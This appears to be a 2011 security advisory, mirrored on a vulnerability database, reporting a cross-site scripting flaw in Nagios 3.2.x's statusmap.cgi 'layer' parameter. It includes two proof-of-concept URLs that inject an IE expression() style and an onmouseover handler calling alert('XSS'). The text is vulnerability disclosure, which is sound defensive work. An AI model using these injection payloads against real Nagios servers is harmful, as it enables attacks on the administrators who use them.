Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25896
HistoryMar 10, 2011 - 12:00 a.m.

Cross-Site Scripting vulnerability in Nagios

2011-03-1000:00:00
vulners.com
45

Advisory: Cross-Site Scripting vulnerability in Nagios
Advisory ID: SSCHADV2011-002
Author: Stefan Schurtz
Affected Software: Successfully tested on: nagios-3.2.0 / nagios-3.2.3
Vendor URL: http://www.nagios.org
Vendor Status: ID 0000207: Cross-Site Scripting vulnerability in Nagios
CVE-ID: -

==========================
Vulnerability Description:

This is Cross-Site Scripting vulnerability

JavaScript can be included in style sheets by using "expression()" (IE only)

==================
Technical Details:

The function "strip_html_brackets" strip > and < from string but it's not enough
to prevent XSS attacks in "statusmap.cgi&layer="

http://site/nagios/cgi-bin/statusmap.cgi?layer=&#39;
style=xss:expression(alert('XSS')) '
http://site/nagios/cgi-bin/statusmap.cgi?layer=&#39; onmouseover="alert('XSS')" '


cgiutils.c

[schnipp]